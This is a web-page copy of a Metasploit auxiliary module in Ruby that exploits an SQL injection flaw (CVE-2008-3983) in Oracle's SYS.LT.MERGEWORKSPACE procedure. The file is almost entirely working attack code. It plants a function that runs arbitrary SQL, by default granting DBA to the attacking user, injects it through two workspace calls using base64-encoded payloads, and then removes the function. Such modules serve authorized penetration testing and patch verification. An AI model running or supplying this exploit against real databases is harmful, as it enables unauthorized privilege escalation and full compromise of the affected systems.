Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb
19715 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::ORACLE

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'Oracle DB SQL Injection via SYS.LT.MERGEWORKSPACE',

14
        'Description' => %q{

15
          This module exploits a sql injection flaw in the MERGEWORKSPACE

16
          procedure of the PL/SQL package SYS.LT. Any user with execute

17
          privilege on the vulnerable package can exploit this vulnerability.

18
        },

19
        'Author' => [ 'CG' ],

20
        'License' => MSF_LICENSE,

21
        'References' => [

22
          [ 'CVE', '2008-3983'],

23
          [ 'OSVDB', '49325'],

24
          [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ],

25
          [ 'URL', 'http://www.dsecrg.com/pages/expl/show.php?id=23' ]

26


27
        ],

28
        'DisclosureDate' => '2008-10-22',

29
        'Notes' => {

30
          'Stability' => [CRASH_SAFE],

31
          'SideEffects' => [IOC_IN_LOGS],

32
          'Reliability' => []

33
        }

34
      )

35
    )

36


37
    register_options(

38
      [

39
        OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]),

40
      ]

41
    )

42
  end

43


44
  def run

45
    return if !check_dependencies

46


47
    name = Rex::Text.rand_text_alpha_upper(1..10)

48
    rand1 = Rex::Text.rand_text_alpha_upper(1..10)

49
    rand2 = Rex::Text.rand_text_alpha_upper(1..10)

50
    rand3 = Rex::Text.rand_text_alpha_upper(1..10)

51
    cruft = Rex::Text.rand_text_alpha_upper(1)

52


53
    function = "

54
      CREATE OR REPLACE FUNCTION #{cruft}

55
      RETURN VARCHAR2 AUTHID CURRENT_USER

56
      AS

57
      PRAGMA AUTONOMOUS_TRANSACTION;

58
      BEGIN

59
      EXECUTE IMMEDIATE '#{datastore['SQL']}';

60
      COMMIT;

61
      RETURN '#{cruft}';

62
      END;"

63


64
    package1 = %|

65
      BEGIN

66
        SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');

67
      END;

68
      |

69


70
    package2 = %|

71
      BEGIN

72
        SYS.LT.MERGEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');

73
      END;

74
      |

75


76
    uno = Rex::Text.encode_base64(function)

77
    dos = Rex::Text.encode_base64(package1)

78
    tres = Rex::Text.encode_base64(package2)

79


80
    sql = %|

81
      DECLARE

82
      #{rand1} VARCHAR2(32767);

83
      #{rand2} VARCHAR2(32767);

84
      #{rand3} VARCHAR2(32767);

85
      BEGIN

86
      #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{uno}')));

87
      EXECUTE IMMEDIATE #{rand1};

88
      #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}')));

89
      EXECUTE IMMEDIATE #{rand2};

90
      #{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{tres}')));

91
      EXECUTE IMMEDIATE #{rand3};

92
      END;

93
      |

94


95
    clean = "DROP FUNCTION #{cruft}"

96


97
    # Try first, if it's good.. keep doing the dance.

98
    print_status('Attempting sql injection on SYS.LT.MERGEWORKSPACE...')

99
    begin

100
      prepare_exec(sql)

101
    rescue StandardError

102
      return

103
    end

104


105
    print_status("Removing function '#{cruft}'...")

106
    prepare_exec(clean)

107
  end

108
end

109


110